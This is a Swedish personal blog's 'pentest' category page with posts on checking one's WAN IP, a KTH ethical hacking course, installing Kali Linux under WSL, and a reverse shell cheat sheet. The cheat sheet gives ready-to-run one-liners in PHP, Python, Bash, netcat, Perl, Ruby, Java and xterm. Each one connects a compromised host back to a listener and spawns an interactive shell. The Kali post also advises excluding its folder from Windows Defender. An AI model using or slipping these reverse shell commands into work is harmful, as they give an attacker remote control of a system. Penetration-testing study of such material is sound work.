Jörgens liv och leverne

Lite osammanhängade om Jörgen och hans liv...

Kategori: pentest (sida 1 av 2)

Kolla vilken WAN IP du har

Om du vill kolla vilken WAN IP du har använder du oftast curl, eller hur?

curl icanhazip.com

Om du inte har curl, wget eller någon annan av de klassiska så kan du använda dig i stället.

dig TXT o-o.myaddr.l.google.com @ns1.google.com +short

Bra om du sitter i en begränsad miljö och behöver veta

Ethical Hacking

I samband med min kurs i Ethical Hacking fick jag frågan om jag vill berätta om den, nedan kan du se vad jag tyckte.

Jag kan varmt rekommendera KTH’s distanskurs i Ethical Hacking (7.5hp), mycket bra kurs om du har intresse och vill få en bra grund att bygga vidare på, eller om du bara vill veta mer så att du kan säkra upp ditt online-liv.

Här finns information om kursen: https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp

Länk till artikeln

https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp/students/to-win-over-the-hacks-you-have-to-think-like-the-hacker-1.824598

Och som PDF

To win over the hacks, you have to think like the hacker_ _ KTH

Reverse shell

Börja med att skriva det här lokalt: nc -l -p 4444 -vvv

Och på remote sidan gör du någon av dessa

Php :

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :

nc -e /bin/sh 192.168.0.5 4444

Perl :

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :

xterm -display 192.168.0.5:4444

Source https://github.com/ismailtasdelen/reverse-shell-cheatsheet

Installera Kali Linux på Windows 10

Nu är det möjligt att installera Kali Linux på Windows 10, det är möjligt tack vara WSL (Windows Subsystem for Linux). Helcoolt 🙂

För att installera Kali måste du först börja med att akrivera WSL, det gör du lättast genom att öppna ett powershell som administratör och dä skriver du

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

Då aktiveras WSL och efter en omstart av Windows så börjar det roliga!

Öppna windows store och sök efter linux, du kommer då att se Kali Linux, välj den och klicka på Install

Sök fram Kali Linux och installera

När installationen är klart så kan du starta Kali Linux genom att klicka på det i startmenyn eller trycka windows+R och skriva kali

Då installationen du fått är bantad så bör du installera ytterligare paket, t.ex. något av dessa:

apt-get install kali-linux-full    (allt man oftast behöver) 9GB
apt-get install kali-linux-top10  (för de 10 populäraste paketen) 3.5GB

En koplett lista på (meta-)paket finns här:
https://www.kali.org/news/kali-linux-metapackages/

Vissa paket kommer att trigga windows defender så du bör lägga in ett undantag för Kali Linux i reglerna. Se efter vad mappen heter i ditt system, den heter något som liknar:

C:\Users\<username>\AppData\Local\Packages\KaliLinux.<idsträng>

Lägg till det undantaget innan du installerar paket

msfconsole Tadaaa

Sen är det bara att köra på som vanligt, ha så kul.

« Äldre inlägg